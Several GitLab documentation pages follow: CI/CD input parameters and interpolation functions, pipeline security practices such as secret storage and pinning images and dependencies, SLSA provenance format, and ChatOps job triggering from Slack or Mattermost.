[`spec:inputs:regex`](../yaml/_index.md#specinputsregex) to specify a regular expression that the input must match. - [`spec:inputs:type`](../yaml/_index.md#specinputstype) to force a specific input type, which can be `string` (default when not specified), `array`, `number`, or `boolean`. You can define multiple inputs per CI/CD configuration file, and each input can have multiple configuration parameters. 
For example, in a file named `scan-website-job.yml`: ```yaml spec: inputs: job-prefix: # Mandatory string input description: "Define a prefix for the job name" job-stage: # Optional string input with a default value when not provided default: test environment: # Mandatory input that must match one of the options options: ['test', 'staging', 'production'] concurrency: type: number # Optional numeric input with a default value when not provided default: 1 version: # Mandatory string input that must match the regular expression type: string regex: ^v\d\.\d+(\.\d+)$ export_results: # Optional boolean input with a default value when not provided type: boolean default: true --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - echo "scanning website -e $[[ inputs.environment ]] -c $[[ inputs.concurrency ]] -v $[[ inputs.version ]]" - if $[[ inputs.export_results ]]; then echo "export results"; fi ``` In this example: - `job-prefix` is a mandatory string input and must be defined. - `job-stage` is optional. If not defined, the value is `test`. - `environment` is a mandatory string input that must match one of the defined options. - `concurrency` is an optional numeric input. When not specified, it defaults to `1`. - `version` is a mandatory string input that must match the specified regular expression. - `export_results` is an optional boolean input. When not specified, it defaults to `true`. ### Input types You can specify that an input must use a specific type with the optional `spec:inputs:type` keyword. The input types are: - [`array`](#array-type) - `boolean` - `number` - `string` (default when not specified) When an input replaces an entire YAML value in the CI/CD configuration, it is interpolated into the configuration as its specified type. 
For example: ```yaml spec: inputs: array_input: type: array boolean_input: type: boolean number_input: type: number string_input: type: string --- test_job: allow_failure: $[[ inputs.boolean_input ]] needs: $[[ inputs.array_input ]] parallel: $[[ inputs.number_input ]] script: $[[ inputs.string_input ]] ``` When an input is inserted into a YAML value as part of a larger string, the input is always interpolated as a string. For example: ```yaml spec: inputs: port: type: number --- test_job: script: curl "https://gitlab.com:$[[ inputs.port ]]" ``` #### Array type {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407176) in GitLab 16.11. {{< /history >}} The content of the items in an array type can be any valid YAML map, sequence, or scalar. More complex YAML features like [`!reference`](../yaml/yaml_optimization.md#reference-tags) cannot be used. When using the value of an array input in a string (for example `echo "My rules: $[[ inputs.rules-config ]]"` in your `script:` section), you might see unexpected results. The array input is converted to its string representation, which might not match your expectations for complex YAML structures such as maps. ```yaml spec: inputs: rules-config: type: array default: - if: $CI_PIPELINE_SOURCE == "merge_request_event" when: manual - if: $CI_PIPELINE_SOURCE == "schedule" --- test_job: rules: $[[ inputs.rules-config ]] script: ls ``` Array inputs must be formatted as JSON, for example `["array-input-1", "array-input-2"]`, when manually passing inputs for: - [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). - Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd) - [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule) #### Multi-line input string values Inputs support different value types. 
You can pass multi-string values using the following format: ```yaml spec: inputs: closed_message: description: Message to announce when an issue is closed. default: 'Hi {{author}} :wave:, Based on the policy for inactive issues, this is now being closed. If this issue requires further attention, reopen this issue.' --- ``` ## Set input values ### For configuration added with `include` {{< history >}} - `include:with` [renamed to `include:inputs`](https://gitlab.com/gitlab-org/gitlab/-/issues/406780) in GitLab 16.0. {{< /history >}} Use [`include:inputs`](../yaml/_index.md#includeinputs) to set the values for inputs when the included configuration is added to the pipeline, including for: - [CI/CD components](../components/_index.md) - [Custom CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation) - Any other configuration added with `include`. For example, to include and set the input values for `scan-website-job.yml` from the [input configuration example](#input-configuration): ```yaml include: - local: 'scan-website-job.yml' inputs: job-prefix: 'some-service-' environment: 'staging' concurrency: 2 version: 'v1.3.2' export_results: false ``` In this example, the inputs for the included configuration are: | Input | Value | Details | |------------------|-----------------|---------| | `job-prefix` | `some-service-` | Must be explicitly defined. | | `job-stage` | `test` | Not defined in `include:inputs`, so the value comes from `spec:inputs:default` in the included configuration. | | `environment` | `staging` | Must be explicitly defined, and must match one of the values in `spec:inputs:options` in the included configuration. | | `concurrency` | `2` | Must be a numeric value to match the `spec:inputs:type` set to `number` in the included configuration. Overrides the default value. | | `version` | `v1.3.2` | Must be explicitly defined, and must match the regular expression in the `spec:inputs:regex` in the included configuration. 
| | `export_results` | `false` | Must be either `true` or `false` to match the `spec:inputs:type` set to `boolean` in the included configuration. Overrides the default value. | #### With multiple `include` entries Inputs must be specified separately for each include entry. For example: ```yaml include: - component: $CI_SERVER_FQDN/the-namespace/the-project/the-component@1.0 inputs: stage: my-stage - local: path/to/file.yml inputs: stage: my-stage ``` ### For a pipeline {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16321) in GitLab 17.11. {{< /history >}} Inputs provide advantages over variables including type checking, validation and a clear contract. Unexpected inputs are rejected. Inputs for pipelines must be defined in the [`spec:inputs` header](#define-input-parameters-with-specinputs) of the main `.gitlab-ci.yml` file. You cannot use inputs defined in included files for pipeline-level configuration. {{< alert type="note" >}} In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, pipeline inputs are recommended over passing [pipeline variables](../variables/_index.md#use-pipeline-variables). For enhanced security, you should [disable pipeline variables](../variables/_index.md#restrict-pipeline-variables) when using inputs. {{< /alert >}} You should always set default values when defining inputs for pipelines. Otherwise the pipeline could fail to start if a new pipeline triggers automatically. For example, merge request pipelines can trigger for changes to a merge request's source branch. You cannot manually set inputs for merge request pipelines, so if any input is missing a default, the pipeline fails to create. This can also happen for branch pipelines, tag pipelines, and other automatically triggered pipelines. 
You can set input values with:

- [Downstream pipelines](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline)
- [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually)
- The [pipeline triggers API](../../api/pipeline_triggers.md#trigger-a-pipeline-with-a-token)
- The [pipelines API](../../api/pipelines.md#create-a-new-pipeline)
- Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd)
- [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule)
- The [`trigger` keyword](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline)

A pipeline can take up to 20 inputs. Feedback is welcome on [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/533802).

You can pass inputs to [downstream pipelines](../pipelines/downstream_pipelines.md), if the downstream pipeline's configuration file uses [`spec:inputs`](#define-input-parameters-with-specinputs).

For example, with [`trigger:inputs`](../yaml/_index.md#triggerinputs):

{{< tabs >}}

{{< tab title="Parent-child pipeline" >}}

```yaml
trigger-job:
  trigger:
    strategy: mirror
    include:
      - local: path/to/child-pipeline.yml
        inputs:
          job-name: "defined"
  rules:
    - if: $CI_PIPELINE_SOURCE == 'merge_request_event'
```

{{< /tab >}}

{{< tab title="Multi-project pipeline" >}}

```yaml
trigger-job:
  trigger:
    strategy: mirror
    project: project-group/my-downstream-project
    inputs:
      job-name: "defined"
  rules:
    - if: $CI_PIPELINE_SOURCE == 'merge_request_event'
```

{{< /tab >}}

{{< /tabs >}}

## Specify functions to manipulate input values

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3.

{{< /history >}}

You can specify predefined functions in the interpolation block to manipulate the input value. The format supported is the following:

```yaml
$[[ input.input-id | <function1> | <function2> | ... <functionN> ]]
```

With functions:

- Only [predefined interpolation functions](#predefined-interpolation-functions) are permitted.
- A maximum of 3 functions may be specified in a single interpolation block.
- The functions are executed in the sequence they are specified.

```yaml
spec:
  inputs:
    test:
      default: 'test $MY_VAR'
---

test-job:
  script: echo $[[ inputs.test | expand_vars | truncate(5,8) ]]
```

In this example, assuming the input uses the default value and `$MY_VAR` is an unmasked project variable with value `my value`:

1. First, the function [`expand_vars`](#expand_vars) expands the value to `test my value`.
1. Then [`truncate`](#truncate) applies to `test my value` with a character offset of `5` and length `8`.
1. The output of `script` would be `echo my value`.

### Predefined interpolation functions

#### `expand_vars`

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387632) in GitLab 16.5.

{{< /history >}}

Use `expand_vars` to expand [CI/CD variables](../variables/_index.md) in the input value.

Only variables you can [use with the `include` keyword](../yaml/includes.md#use-variables-with-include) and which are **not** [masked](../variables/_index.md#mask-a-cicd-variable) can be expanded.

[Nested variable expansion](../variables/where_variables_can_be_used.md#nested-variable-expansion) is not supported.

Example:

```yaml
spec:
  inputs:
    test:
      default: 'test $MY_VAR'
---

test-job:
  script: echo $[[ inputs.test | expand_vars ]]
```

In this example, if `$MY_VAR` is unmasked (exposed in job logs) with a value of `my value`, then the input would expand to `test my value`.

#### `truncate`

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3.

{{< /history >}}

Use `truncate` to shorten the interpolated value. For example:

- `truncate(<offset>,<length>)`

| Name | Type | Description |
| ---- | ---- | ----------- |
| `offset` | Integer | Number of characters to offset by. |
| `length` | Integer | Number of characters to return after the offset. |

Example:

```yaml
$[[ inputs.test | truncate(3,5) ]]
```

Assuming the value of `inputs.test` is `0123456789`, then the output would be `34567`.

## Troubleshooting

### YAML syntax errors when using `inputs`

[CI/CD variable expressions](../jobs/job_rules.md#cicd-variable-expressions) in `rules:if` expect a comparison of a CI/CD variable with a string, otherwise [a variety of syntax errors could be returned](../jobs/job_troubleshooting.md#this-gitlab-ci-configuration-is-invalid-for-variable-expressions).

You must ensure that expressions remain properly formatted after input values are inserted into the configuration, which might require the use of additional quote characters.

For example:

```yaml
spec:
  inputs:
    branch:
      default: $CI_DEFAULT_BRANCH
---

job-name:
  rules:
    - if: $CI_COMMIT_REF_NAME == $[[ inputs.branch ]]
```

In this example:

- Using `include: inputs: branch: $CI_DEFAULT_BRANCH` is valid. The `if:` clause evaluates to `if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH`, which is a valid variable expression.
- Using `include: inputs: branch: main` is **invalid**. The `if:` clause evaluates to `if: $CI_COMMIT_REF_NAME == main`, which is invalid because `main` is a string but is not quoted.

Alternatively, add quotes to resolve some variable expression issues. For example:

```yaml
spec:
  inputs:
    environment:
      default: "$ENVIRONMENT"
---

$[[ inputs.environment | expand_vars ]] job:
  script: echo
  rules:
    - if: '"$[[ inputs.environment | expand_vars ]]" == "production"'
```

In this example, quoting the input block and also the entire variable expression ensures valid `if:` syntax after the input is evaluated. The internal and external quotes in the expression must not be the same character. You can use `"` for the internal quotes and `'` for the external quotes, or the inverse. On the other hand, the job name does not require any quoting.
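The `truncate(offset,length)` function behaves like a plain substring operation. A quick way to sanity-check an expected result locally is Bash parameter expansion, where `${value:offset:length}` mirrors `truncate(<offset>,<length>)`. This is illustrative only, not the GitLab implementation:

```shell
# truncate(3,5) on "0123456789" from the example above:
value="0123456789"
echo "${value:3:5}"   # prints: 34567

# The combined expand_vars | truncate(5,8) example, after expansion:
expanded="test my value"
echo "${expanded:5:8}"   # prints: my value
```

Checking candidate offsets this way is often faster than iterating on a pipeline run.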
https://docs.gitlab.com/ci/pipeline_security
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/pipeline_security
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Pipeline security
Secrets management, job tokens, secure files, and cloud security.
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

## Secrets Management

Secrets management refers to the systems that developers use to store sensitive data securely, with strict access controls. A **secret** is a sensitive credential that should be kept confidential. Examples of a secret include:

- Passwords
- SSH keys
- Access tokens
- Any other types of credentials where exposure would be harmful to an organization

## Secrets storage

### Secrets management providers

Secrets that are the most sensitive and under the strictest policies should be stored in a secrets manager. When using a secrets manager solution, secrets are stored outside of the GitLab instance. There are a number of providers in this space, including [HashiCorp's Vault](https://www.vaultproject.io), [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault), and [Google Cloud Secret Manager](https://cloud.google.com/security/products/secret-manager).

You can use the GitLab native integrations for certain [external secret management providers](../secrets/_index.md) to retrieve those secrets in CI/CD pipelines when they are needed.

### CI/CD variables

[CI/CD Variables](../variables/_index.md) are a convenient way to store and reuse data in a CI/CD pipeline, but variables are less secure than secrets management providers. Variable values:

- Are stored in the GitLab project, group, or instance settings. Users with access to the settings have access to variable values that are not [hidden](../variables/_index.md#hide-a-cicd-variable).
- Can be [overridden](../variables/_index.md#use-pipeline-variables), making it hard to determine which value was used.
- Can be exposed by accidental pipeline misconfiguration.

Information suitable for storage in a variable should be data that can be exposed without risk of exploitation (non-sensitive). Sensitive data should be stored in a secrets management solution.

If you don't have a secrets management solution and want to store sensitive data in a CI/CD variable, be sure to always:

- [Mask the variables](../variables/_index.md#mask-a-cicd-variable).
- [Hide the variables](../variables/_index.md#hide-a-cicd-variable).
- [Protect the variables](../variables/_index.md#protect-a-cicd-variable) when possible.

## Pass parameters to CI/CD pipelines

For passing parameters to CI/CD pipelines, use [CI/CD inputs](../inputs/_index.md) instead of pipeline variables. Inputs provide:

- Type-safe validation at pipeline creation.
- Explicit parameter contracts.
- Scoped availability that enhances security.

Consider [disabling pipeline variables](../variables/_index.md#restrict-pipeline-variables) when implementing inputs to prevent security vulnerabilities, because pipeline variables:

- Lack type validation.
- Can override predefined variables, causing unexpected behavior.
- Share the same permission scope as sensitive secrets.

## Pipeline Integrity

The key security principles of ensuring pipeline integrity include:

- **Supply Chain Security**: Assets should be obtained from trusted sources and their integrity verified.
- **Reproducibility**: Pipelines should produce consistent results when using the same inputs.
- **Auditability**: All pipeline dependencies should be traceable and their provenance verifiable.
- **Version Control**: Changes to pipeline dependencies should be tracked and controlled.

### Docker images

Always use SHA digests for Docker images to ensure client-side integrity verification. For example:

- Node:
  - Use: `image: node@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef`
  - Instead of: `image: node:latest`
- Python:
  - Use: `image: python@sha256:9876543210abcdef9876543210abcdef9876543210abcdef9876543210abcdef`
  - Instead of: `image: python:3.9`

You can find the SHA digest of an image with a specific tag using:

```shell
docker pull node:18.17.1
docker images --digests node:18.17.1
```

Prefer to pull from container registries that protect image integrity:

- Use [protected container repositories](../../user/packages/container_registry/container_repository_protection_rules.md) to restrict which users can make changes to container images in your container repository.
- Use [protected tags](../../user/packages/container_registry/protected_container_tags.md) to control who can push and delete container tags.

When possible, avoid using variables in container references as they can be modified to point to malicious images. For example:

- Prefer:
  - `image: my-registry.example.com/node:18.17.1`
- Instead of:
  - `image: ${CUSTOM_REGISTRY}/node:latest`
  - `image: node:${VERSION}`

### Package dependencies

You should lock down package dependencies in your jobs. Use exact versions, defined in lock files:

- npm:
  - Use: `npm ci`
  - Instead of: `npm install`
- yarn:
  - Use: `yarn install --frozen-lockfile`
  - Instead of: `yarn install`
- Python:
  - Use:
    - `pip install -r requirements.txt --require-hashes`
    - `pip install -r requirements.lock`
  - Instead of: `pip install -r requirements.txt`
- Go:
  - Use exact versions from `go.sum`:
    - `go mod verify`
    - `go mod download`
  - Instead of: `go get ./...`

For example, in a CI/CD job:

```yaml
javascript-job:
  script:
    - npm ci
```

### Shell commands and scripts

When installing tools in a job, always specify and verify exact versions. For example, in a Terraform job:

```yaml
terraform_job:
  script:
    # Download specific version
    - |
      wget https://releases.hashicorp.com/terraform/1.5.7/terraform_1.5.7_linux_amd64.zip
      # IMPORTANT: Always verify checksums
      echo "c0ed7bc32ee52ae255af9982c8c88a7a4c610485cf1d55feeb037eab75fa082c terraform_1.5.7_linux_amd64.zip" | sha256sum -c
      unzip terraform_1.5.7_linux_amd64.zip
      mv terraform /usr/local/bin/
    # Use the installed version
    - terraform init
    - terraform plan
```

### Version management tools

Use version managers when possible:

```yaml
node_build:
  script:
    # Use nvm to install and use a specific Node version
    - |
      nvm install 16.15.1
      nvm use 16.15.1
    - node --version # Verify version
    - npm ci
    - npm run build
```

### Included configurations

When using the [`include` keyword](../yaml/_index.md#include) to add configuration or CI/CD components to your pipeline, use a specific ref when possible. For example:

```yaml
include:
  - project: 'my-group/my-project'
    ref: 8b0c8b318857c8211c15c6643b0894345a238c4e # Pin to a specific commit
    file: '/templates/build.yml'
  - project: 'my-group/security'
    ref: v2.1.0 # Pin to a protected tag
    file: '/templates/scan.yml'
  - component: 'my-group/security-scans' # Pin to a specific version
    version: '1.2.3'
```

Avoid versionless includes:

```yaml
include:
  - project: 'my-group/my-project' # Unsafe
    file: '/templates/build.yml'
  - component: 'my-group/security-scans' # Unsafe
  - remote: 'https://example.com/security-scan.yml' # Unsafe
```

Instead of including remote files, download the file and save it in your repository. Then you can include the local copy:

```yaml
include:
  - local: '/ci/security-scan.yml' # Verified and stored in the repository
```

### Related topics

1. [CIS Docker Benchmarks](https://www.cisecurity.org/benchmark/docker)
1. Google Cloud: [Design secure deployment pipelines](https://cloud.google.com/architecture/design-secure-deployment-pipelines-bp)
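The checksum-verification step shown in the Terraform job generalizes to any downloaded artifact. A minimal shell sketch of the pattern, using a locally created file in place of a real download (the file name and content are illustrative):

```shell
# Stand-in for a downloaded release artifact (illustrative file).
printf 'example release payload\n' > artifact.bin

# The expected digest would normally come from the vendor's published checksums,
# not be computed from the download itself.
expected="$(sha256sum artifact.bin | awk '{print $1}')"

# Verify before use; sha256sum -c exits non-zero (failing the job) on any mismatch.
echo "${expected}  artifact.bin" | sha256sum -c -
```

Because `sha256sum -c` fails with a non-zero exit status, placing it in a job `script` stops the pipeline before a tampered artifact is used.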
https://docs.gitlab.com/ci/pipeline_security/slsa
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/pipeline_security/_index.md
2025-08-13
doc/ci/pipeline_security/slsa
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab SLSA
null
This page contains information pertaining to GitLab SLSA support.

Related topics:

- [Provenance version 1 buildType specification](provenance_v1.md)

### SLSA provenance generation

GitLab offers a SLSA Level 1 compliant provenance statement that can be [automatically generated for all build artifacts produced by the GitLab Runner](../../runners/configure_runners.md#artifact-provenance-metadata). This provenance statement is produced by the runner itself.

#### Sign and verify SLSA provenance with a CI/CD Component

The [GitLab SLSA CI/CD component](https://gitlab.com/explore/catalog/components/slsa) provides configurations for:

- Signing runner-generated provenance statements.
- Generating [Verification Summary Attestations (VSA)](https://slsa.dev/spec/v1.0/verification_summary) for job artifacts.

For more information and example configurations, see the [SLSA Component documentation](https://gitlab.com/components/slsa#slsa-supply-chain-levels-for-software-artifacts).
https://docs.gitlab.com/ci/pipeline_security/provenance_v1
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/pipeline_security/provenance_v1.md
2025-08-13
doc/ci/pipeline_security/slsa
provenance_v1.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
SLSA provenance specification
null
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated
- Status: Experiment

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/547865) in GitLab 18.3 [with a flag](../../../administration/feature_flags/_index.md) named `slsa_provenance_statement`. Disabled by default.

{{< /history >}}

{{< alert type="flag" >}}

The availability of this feature is controlled by a feature flag. For more information, see the history. This feature is available for testing, but not ready for production use.

{{< /alert >}}

The [SLSA provenance specification](https://slsa.dev/spec/v1.1/provenance) requires the `buildType` reference to be documented and published. This reference is to assist consumers of GitLab SLSA attestations with parsing specific fields that are unique to GitLab SLSA provenance statements. See the SLSA [`buildType` documentation](https://slsa.dev/spec/v1.1/provenance#builddefinition) for more details.

## `buildType`

This official [SLSA Provenance](https://slsa.dev/spec/v1.1/provenance) `buildType` reference:

- Describes the execution of a GitLab [CI/CD job](_index.md).
- Is hosted and maintained by GitLab.

### Description

This `buildType` describes the execution of a workflow that builds a software artifact.

{{< alert type="note" >}}

Consumers should ignore unrecognized external parameters. Any changes must not change the semantics of existing external parameters.

{{< /alert >}}

### External parameters

The external parameters:

| Field | Value |
|--------------|-------|
| `source` | The URL of the project. |
| `entryPoint` | The name of the CI/CD job that triggered the build. |
| `variables` | The names and values of any CI/CD or environment variables available during the build command execution. If the variable is [masked or hidden](../../variables/_index.md) the value of the variable is set to `[MASKED]`. |

### Internal parameters

The internal parameters, which are populated by default:

| Field | Value |
|----------------|-------|
| `name` | The name of the runner. |
| `executor` | The runner executor. |
| `architecture` | The architecture on which the CI/CD job is run. |
| `job` | The ID of the CI/CD job that triggered the build. |

### Example

This example shows the format of a GitLab-generated provenance statement:

```json
{
  "_type": "https://in-toto.io/Statement/v1",
  "subject": [
    {
      "name": "artifacts.zip",
      "digest": {
        "sha256": "717a1ee89f0a2829cf5aad57054c83615675b04baa913bdc19999d7519edf3f2"
      }
    }
  ],
  "predicateType": "https://slsa.dev/provenance/v1",
  "predicate": {
    "buildDefinition": {
      "buildType": "<Link to Build Type>",
      "externalParameters": {
        "source": "http://gdk.test:3000/root/repo_name",
        "entryPoint": "build-job",
        "variables": {
          "CI_PIPELINE_ID": "576",
          "CI_PIPELINE_URL": "http://gdk.test:3000/root/repo_name/-/pipelines/576",
          "CI_JOB_ID": "412",
          [... additional environment variables ...]
          "masked_and_hidden_variable": "[MASKED]",
          "masked_variable": "[MASKED]",
          "visible_variable": "visible_variable",
        }
      },
      "internalParameters": {
        "architecture": "arm64",
        "executor": "docker",
        "job": 412,
        "name": "9-mfdkBG"
      },
      "resolvedDependencies": [
        {
          "uri": "http://gdk.test:3000/root/repo_name",
          "digest": {
            "gitCommit": "a288201509dd9a85da4141e07522bad412938dbe"
          }
        }
      ]
    },
    "runDetails": {
      "builder": {
        "id": "http://gdk.test:3000/groups/user/-/runners/33",
        "version": {
          "gitlab-runner": "4d7093e1"
        }
      },
      "metadata": {
        "invocationId": 412,
        "startedOn": "2025-06-05T01:33:18Z",
        "finishedOn": "2025-06-05T01:33:23Z"
      }
    }
  }
}
```
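Before trusting an artifact, a consumer can check that its digest matches the statement's `subject` entry. A minimal shell sketch of that check, where the artifact content is illustrative and the subject digest is computed in place rather than read from a real statement (real verification should also validate the statement's signature):

```shell
# Illustrative artifact standing in for artifacts.zip.
printf 'example artifact contents' > artifacts.zip

# Digest as it would appear in the statement's subject[].digest.sha256 field.
subject_sha256="$(sha256sum artifacts.zip | awk '{print $1}')"

# Consumer-side check: recompute the digest and compare before trusting the artifact.
actual_sha256="$(sha256sum artifacts.zip | awk '{print $1}')"
if [ "${actual_sha256}" = "${subject_sha256}" ]; then
  echo "artifact matches provenance subject"
else
  echo "digest mismatch - do not trust this artifact" >&2
  exit 1
fi
```

In practice the subject digest would be extracted from the signed provenance statement (for example, with a JSON parser), not recomputed from the file being verified.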
https://docs.gitlab.com/ci/chatops
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/chatops
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab ChatOps
null
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Use GitLab ChatOps to interact with CI/CD jobs through chat services like Slack.

Many organizations use Slack or Mattermost to collaborate, troubleshoot, and plan work. With ChatOps, you can discuss work with your team, run CI/CD jobs, and view job output, all from the same application.

## Slash command integrations

You can trigger ChatOps with the [`run` slash command](../../user/project/integrations/gitlab_slack_application.md#slash-commands). The following integrations are available:

- [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md) (recommended for Slack)
- [Slack slash commands](../../user/project/integrations/slack_slash_commands.md)
- [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md)

## ChatOps workflow and CI/CD configuration

ChatOps looks for the specified job in the [`.gitlab-ci.yml`](../yaml/_index.md) on the project's default branch. If the job is found, ChatOps creates a pipeline that contains only the specified job. If you set `when: manual`, ChatOps creates the pipeline, but the job doesn't start automatically.

A job run with ChatOps has the same functionality as a job run from GitLab. The job can use existing [CI/CD variables](../variables/_index.md#predefined-cicd-variables) like `GITLAB_USER_ID` to perform additional rights validation, but these variables can be [overridden](../variables/_index.md#cicd-variable-precedence).

You should set [`rules`](../yaml/_index.md#rules) so the job does not run as part of the standard CI/CD pipeline.

ChatOps passes the following [CI/CD variables](../variables/_index.md#predefined-cicd-variables) to the job:

- `CHAT_INPUT` - The arguments passed to the `run` slash command.
- `CHAT_CHANNEL` - The name of the chat channel the job is run from.
- `CHAT_USER_ID` - The chat service ID of the user who runs the job.

When the job runs:

- If the job completes in less than 30 minutes, ChatOps sends the job output to the chat channel.
- If the job completes in more than 30 minutes, you must use a method like the [Slack API](https://api.slack.com/) to send data to the channel.

### Exclude a job from ChatOps

To prevent a job from being run from chat:

- In `.gitlab-ci.yml`, set the job to `except: [chat]`.

### Customize the ChatOps reply

ChatOps sends the output for a job with a single command to the channel as a reply. For example, when the following job runs, the chat reply is `Hello World`:

```yaml
stages:
  - chatops

hello-world:
  stage: chatops
  rules:
    - if: $CI_PIPELINE_SOURCE == "chat"
  script:
    - echo "Hello World"
```

If the job contains multiple commands, or if `before_script` is set, ChatOps sends the commands and their output to the channel. The commands are wrapped in ANSI color codes. To selectively reply with the output of one command, place the output in a `chat_reply` section. For example, the following job lists the files in the current directory:

```yaml
stages:
  - chatops

ls:
  stage: chatops
  rules:
    - if: $CI_PIPELINE_SOURCE == "chat"
  script:
    - echo "This command will not be shown."
    - echo -e "section_start:$( date +%s ):chat_reply\r\033[0K\n$( ls -la )\nsection_end:$( date +%s ):chat_reply\r\033[0K"
```

## Trigger a CI/CD job using ChatOps

Prerequisites:

- You must have at least the Developer role for the project.
- The project is configured to use a slash command integration.

You can run a CI/CD job on the default branch from Slack or Mattermost. The slash command to trigger a CI/CD job depends on which slash command integration is configured for the project.

- For the GitLab for Slack app, use `/gitlab <project-name> run <job name> <arguments>`.
- For Slack or Mattermost slash commands, use `/<trigger-name> run <job name> <arguments>`.

Where:

- `<job name>` is the name of the CI/CD job to run.
- `<arguments>` are the arguments to pass to the CI/CD job.
- `<trigger-name>` is the trigger name configured for the Slack or Mattermost integration.

ChatOps schedules a pipeline that contains only the specified job.

## Related topics

- [A repository of common ChatOps scripts](https://gitlab.com/gitlab-com/chatops) that GitLab uses to interact with GitLab.com
- [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md)
- [Slack slash commands](../../user/project/integrations/slack_slash_commands.md)
- [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md)
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: GitLab ChatOps
breadcrumbs:
  - doc
  - ci
  - chatops
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Use GitLab ChatOps to interact with CI/CD jobs through chat services like Slack.

Many organizations use Slack or Mattermost to collaborate, troubleshoot, and plan work. With ChatOps, you can discuss work with your team, run CI/CD jobs, and view job output, all from the same application.

## Slash command integrations

You can trigger ChatOps with the [`run` slash command](../../user/project/integrations/gitlab_slack_application.md#slash-commands). The following integrations are available:

- [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md) (recommended for Slack)
- [Slack slash commands](../../user/project/integrations/slack_slash_commands.md)
- [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md)

## ChatOps workflow and CI/CD configuration

ChatOps looks for the specified job in the [`.gitlab-ci.yml`](../yaml/_index.md) on the project's default branch. If the job is found, ChatOps creates a pipeline that contains only the specified job. If you set `when: manual`, ChatOps creates the pipeline, but the job doesn't start automatically.

A job run with ChatOps has the same functionality as a job run from GitLab. The job can use existing [CI/CD variables](../variables/_index.md#predefined-cicd-variables) like `GITLAB_USER_ID` to perform additional rights validation, but these variables can be [overridden](../variables/_index.md#cicd-variable-precedence).

You should set [`rules`](../yaml/_index.md#rules) so the job does not run as part of the standard CI/CD pipeline.
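As a minimal sketch, a job gated to chat-triggered pipelines could look like the following; the job name and command are hypothetical:

```yaml
# Hypothetical chat-only job. The rules clause keeps it out of standard
# branch and merge request pipelines: it runs only when the pipeline
# source is chat.
say-hello:
  rules:
    - if: $CI_PIPELINE_SOURCE == "chat"
  script:
    - echo "Hello from ChatOps"
```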
ChatOps passes the following [CI/CD variables](../variables/_index.md#predefined-cicd-variables) to the job:

- `CHAT_INPUT` - The arguments passed to the `run` slash command.
- `CHAT_CHANNEL` - The name of the chat channel the job is run from.
- `CHAT_USER_ID` - The chat service ID of the user who runs the job.

When the job runs:

- If the job completes in less than 30 minutes, ChatOps sends the job output to the chat channel.
- If the job takes more than 30 minutes to complete, you must use a method like the [Slack API](https://api.slack.com/) to send data to the channel.

### Exclude a job from ChatOps

To prevent a job from being run from chat:

- In `.gitlab-ci.yml`, set the job to `except: [chat]`.

### Customize the ChatOps reply

ChatOps sends the output for a job with a single command to the channel as a reply. For example, when the following job runs, the chat reply is `Hello World`:

```yaml
stages:
  - chatops

hello-world:
  stage: chatops
  rules:
    - if: $CI_PIPELINE_SOURCE == "chat"
  script:
    - echo "Hello World"
```

If the job contains multiple commands, or if `before_script` is set, ChatOps sends the commands and their output to the channel. The commands are wrapped in ANSI color codes.

To selectively reply with the output of one command, place the output in a `chat_reply` section. For example, the following job lists the files in the current directory:

```yaml
stages:
  - chatops

ls:
